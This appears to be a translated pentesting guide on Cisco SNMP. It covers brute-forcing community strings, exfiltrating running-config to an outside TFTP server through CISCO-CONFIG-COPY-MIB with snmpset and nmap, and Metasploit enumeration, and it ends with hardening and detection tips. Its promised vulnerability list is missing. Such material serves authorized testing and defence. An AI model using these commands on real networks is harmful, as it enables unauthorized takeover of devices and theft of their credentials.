Cisco SNMP

Reading time: 5 minutes

Pentesting Cisco Networks

SNMP funksioneer oor UDP met poorte 161/UDP vir algemene boodskappe en 162/UDP vir valboodskappe. Hierdie protokol staat op gemeenskapsstringe, wat as platte teks "wagwoorde" dien wat kommunikasie tussen SNMP-agente en bestuurders moontlik maak. Hierdie stringe bepaal die toegangsvlak, spesifiek slegs lees (RO) of lees-skryf (RW) regte.

'n Klassieke—maar steeds uiters effektiewe—aanvalsvlak is om gemeenskapsstringe te brute-force om van 'n nie-geverifieerde gebruiker na toesteladministrateur (RW-gemeenskap) te verhoog. 'n Praktiese hulpmiddel vir hierdie taak is onesixtyone:

onesixtyone -c community_strings.txt -i targets.txt

Ander vinnige opsies is die Nmap NSE-skrip snmp-brute of Hydra se SNMP-modules:

nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp

Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)

As jy 'n RW community verkry, kan jy die running-config/startup-config na 'n TFTP/FTP bediener kopieer sonder CLI toegang deur die CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96) te misbruik. Twee algemene benaderings is:

1. Nmap NSE – snmp-ios-config

nmap -sU -p161 --script snmp-ios-config \
--script-args creds.snmp=private 192.168.66.1

Die skripte orkestreer outomaties die kopieeroperasie en druk die konfigurasie na stdout.

2. Handmatige snmpset volgorde

# Copy running-config (4) to a TFTP server (1) – random row id 1234
snmpset -v2c -c private 192.168.66.1 \
1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \    # protocol = tftp
1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \    # sourceFileType = runningConfig
1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \    # destFileType   = networkFile
1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4       # rowStatus = createAndGo

Row identifiers is one-shot; hergebruik binne vyf minute aktiveer inconsistentValue foute.

Sodra die lêer op jou TFTP-bediener is, kan jy akrediteer ( enable secret, username <user> secret, ens.) of selfs 'n gewysigde konfigurasie terug na die toestel druk.

Metasploit goedere

• cisco_config_tftp – laai running-config/startup-config af via TFTP nadat dieselfde MIB misbruik is.
• snmp_enum – versamel toestel inventaris inligting, VLANs, interface beskrywings, ARP tabelle, ens.

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run

Onlangse Cisco SNMP kwesbaarhede (2023 – 2025)

Om verskaffer advies te volg is nuttig om zero-day-to-n-day geleenthede binne 'n betrokkenheid te bepaal:

Eksploiteerbaarheid hang dikwels steeds af van die besit van die gemeenskap string of v3 geloofsbriewe—nog 'n rede waarom brute-forcing daarvan relevant bly.

Versterking & Opsporing wenke

• Opgradeer na 'n reggemaakte IOS/IOS-XE weergawe (sien Cisco advies vir die bogenoemde CVE).
• Verkies SNMPv3 met authPriv (SHA-256/AES-256) bo v1/v2c.

snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>

• Bind SNMP aan 'n bestuur VRF en beperk met standaard genummerde IPv4 ACLs (uitgebreide naam ACLs is riskant – CVE-2024-20373).
• Deaktiveer RW gemeenskappe; indien operasioneel benodig, beperk hulle met ACL en uitsigte: snmp-server community <string> RW 99 view SysView
• Monitor vir:

• UDP/161 pieke of onverwagte bronne (SIEM reëls).
• CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource gebeurtenisse wat uit-baan konfigurasiewijzigings aandui.

• Aktiveer SNMPv3 logging en snmp-server packetsize 1500 om sekere DoS vektore te verminder.

Verwysings

• Cisco: Hoe om Konfigurasies na en van Cisco Toestelle te Kopieer met SNMP
• Cisco Veiligheidsadvies cisco-sa-snmp-uwBXfqww (CVE-2024-20373)